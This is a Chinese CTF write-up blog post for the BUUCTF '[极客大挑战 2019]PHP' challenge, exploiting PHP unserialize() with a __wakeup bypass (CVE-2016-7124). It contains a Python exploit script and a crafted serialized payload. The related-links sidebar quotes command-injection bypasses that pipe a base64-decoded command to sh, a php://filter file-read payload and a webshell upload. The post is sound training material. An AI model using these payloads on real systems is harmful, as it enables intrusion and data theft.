web-[极客大挑战 2019]PHP

最新推荐文章于 2024-05-19 15:49:44 发布
最新推荐文章于 2024-05-19 15:49:44 发布
阅读量179 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wojiushilsy/article/details/105796158
版权

题目要点

  • public、protected与private在序列化时的区别

函数 serialize():将PHP中创建的对象,变成一个字符串
private属性序列化的时候格式是 %00类名%00成员名
protected属性序列化的时候格式是 %00*%00成员名

protected声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的\0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0组合。这也许解释了,为什么如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
-------------------------------------
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中\0 字符也是计算长度的。

  • __wakeup()方法绕过
    一个经常被用来出题的函数
    (CVE-2016-7124)

作用:与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。
绕过:当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过__wakeup 函数的执行。

题目内容

在这里插入图片描述

解题

首先找到备份的网站文件 — www.zip

class.php 源码

<?php
include 'flag.php';
error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

index.php关键源码
<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

大致思路就是通过反序列化来执行__destruct()中的echo f l a g 。 两 个 条 件 flag。两个条件 flagthis->password == 100,$this->username === ‘admin’。

注意:
这里使用python提交,因为他是私有类,
类名和字段名前面都会加上\0的前缀

这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
解法一:

import  requests

url ="http://7bc3f84d-1e2f-4a49-897a-15eb4d1d5255.node3.buuoj.cn"
html = requests.get(url+'?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}')
print(html.text)

解法二:
如果不使用python提交
在url栏中会出现\0
有空白符,而复制的时候会丢失。
加上%00

payload:

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
超级神兽小金刚
关注
专栏目录
第十五题——[极客挑战 2019]PHP
分享简单的安全技术
04-05 235
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,提示为备份文件 第二步:网站备份文件一般放置在www.zip里,访问www.zip得到一个下载提示,下载后得到class.php与index.php 第三步:查看flag.php 什么也没有 第四步:查看index.php 通过index.php得知,index加载了class.php文件并传入一个select参数,然后反序列化。 第五步:查看class.php 由函数_destruct可知当usernam
BUUCTF-WEB-极客挑战 2019 HTTP
JC_xxx的博客
10-06 502
进入题目 右击查看源代码找到了一个名为Secret.phpphp文件 访问Secret.php,看到提示,很明显是要求来自"https://www.Sycsecret.com" 在http请求头直接修改或添加referer字段 修改后,页面的提示发生变化,要求我们使用Syclover 修改User-Agent 修改后,提示要求我们只能要求我们本地访问,这就需要修改X-Forwarded-For(XFF)了 修改X-Forwarded-For 修改后,即可得到flag ...
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 1万+
SQL注入。
CTF-Web-[极客挑战 2019]LoveSQL
归子莫的博客
05-03 1850
CTF-Web-[极客挑战 2019]LoveSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web,[极客挑战 2019]LoveSQL 打开题目的实例 思路 看到这个熟悉的界面,看到...
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 1004
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1366
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
【BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 758
【BUUCTF-Web】 [极客挑战 2019]PHP
【BUUCTF-web极客挑战-2019 PHP
qq_48149564的博客
11-13 142
反序列化
CTF-Web-[极客挑战 2019]Http
归子莫的博客
05-03 6625
CTF-Web-[极客挑战 2019]Http 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web,[极客挑战 2019]Http 打开题目的实例 思路 看到http的题目,打开burp,...
BUUCTF---web---[极客挑战 2019]HardSQL
最新发布
2201_75556700的博客
05-19 810
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用似的方法查表名:这里注意=用like替换。
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 885
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 950
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件型符合要求,但。
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5091
同时,因为private 声明字段为私有字段,只在所声明可见,在该类子类该类对象实例均不可见。因此私有字段字段名在序列化(即构造POC)时,名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果包含www.zip目录。提示:有一个良好的备份网站的习惯。
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1096
Upload=> 文件上传漏洞。
BUUCTF-web [极客挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2914
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
web-[GXYCTF2019]Ping Ping Ping
wojiushilsy的博客
05-14 704
题目要点题目内容解题方法一:命令执行变量拼接方法二:过滤bash用sh执行方法三:内联执行(将反引号内命令的输出作为输入执行) 题目要点 linux常见绕过方法 $IFS$9(空格) 命令执行变量拼接 /?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 过滤bash用sh执行 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 内联执行 将反引号内命令的输出作为输入执行 题目内容 解题 打开链接,提示 /?ip在url输入.
web-[极客挑战 2019]EasySQL
wojiushilsy的博客
04-16 456
题目要点题目内容解题 题目要点 SQL注入—万能密码 题目内容 解题 打开链接是一个登陆界面 最开始我认为用户名就是cl4y 只是在试密码 输入单引号'以后报错,应该是字符型注入 万能密码试一试 ????,成功 后面又试了试,用户名只要不是空,用万能密码都可以登录。 ...
web-[ACTF2020 新生赛]Include
wojiushilsy的博客
05-12 386
题目要点题目内容解题 题目要点 php伪协议 题目内容 解题 打开链接,显示 Can you find out the flag? 由题目名称include大概可以猜出是文件包含。 查看URL:http://fe4ed8ea-3593-45fe-b503-460850c823f5.node3.buuoj.cn/?file=flag.php 果然包含有flag.php 构造payload ?file=php://filter/read=convert.base64-encode/resource=.
web-[极客挑战 2019]Http
wojiushilsy的博客
04-30 385
题目要点题目内容解题 题目要点 User-Agent Referer:Referer :请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。 X-Forwarded-For:可以被用来获取最初发起请求的客户端的IP地址 题目内容 解题 F12查看源码,发现一个页面。 查看页面。 添加Referer请求头:Referer:https://www.Syc...
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值